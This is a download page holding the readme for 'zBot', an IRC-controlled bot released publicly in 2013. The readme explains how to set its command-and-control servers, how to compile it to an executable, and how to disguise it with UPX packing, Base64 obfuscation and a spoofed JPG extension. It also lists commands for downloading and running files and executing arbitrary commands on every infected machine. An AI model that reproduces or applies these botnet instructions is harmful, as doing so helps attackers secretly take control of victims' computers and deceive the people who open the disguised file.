Home
Name Modified Size InfoDownloads / Week
readme.txt 2013-01-25 1.5 kB
Totals: 1 Item   1.5 kB 0
Download and install the following :

- Python:	http://www.python.org (Version 2.7)
- Py2EXE:	http://www.py2exe.org

Edit the config in the main source code :

- admin:	Admin IRC Nick
- ircn		IRC Nick.
- ircs:		IRC Server.
- ircp:		IRC Port.
- ircc:		IRC Channel.
- ircs_backup:	Backup IRC Server.
- ircp_backup:	Backup IRC Port.
- ircc_backup:	Backup IRC Channel.
- version:	zBot Version.

Edit the config in the setup source code :

- cleanup:	Remove un-necessary directories/files.
- compress:	Compress EXE using UPX.
- encrypt:	Encrypt the source code with BASE64.
- spoof:	Spoof file extension to a JPG file.

Compile the main source code :

- Run "setup.py"

Run zBOT and connect to IRC to use commands :

- .dl all [URL]				Download [URL] and execute file,
- .dl [KEY] [URL]			Download [URL] and execute a file on [KEY] machine.
- .cmd all [CMD]			Execute [CMD] on all machines,
- .cmd [KEY] [CMD]			Execute [CMD] on [KEY] machine.
- .info					Information about the bot.
- .kill [KEY]				Uninstall the bot on [KEY] machine.
- .nuke					Uninstall the bot.
- .restart all				Restart the bot machine.
- .restart [KEY]			Restart the bot on [KEY] machine.
- .shutdown all				Shutdown the bot machine.
- .shutdown [KEY]			Shutdown the bot on [KEY] machine.

Note:	 The reference [KEY] can be found in your bot's IRC nick.
Example: If your bot's IRC Nick is [zBOT]2947, your bot's Key is 2947.

Changelog:

Version 1.0.0
- The initial release to the public.
Source: readme.txt, updated 2013-01-25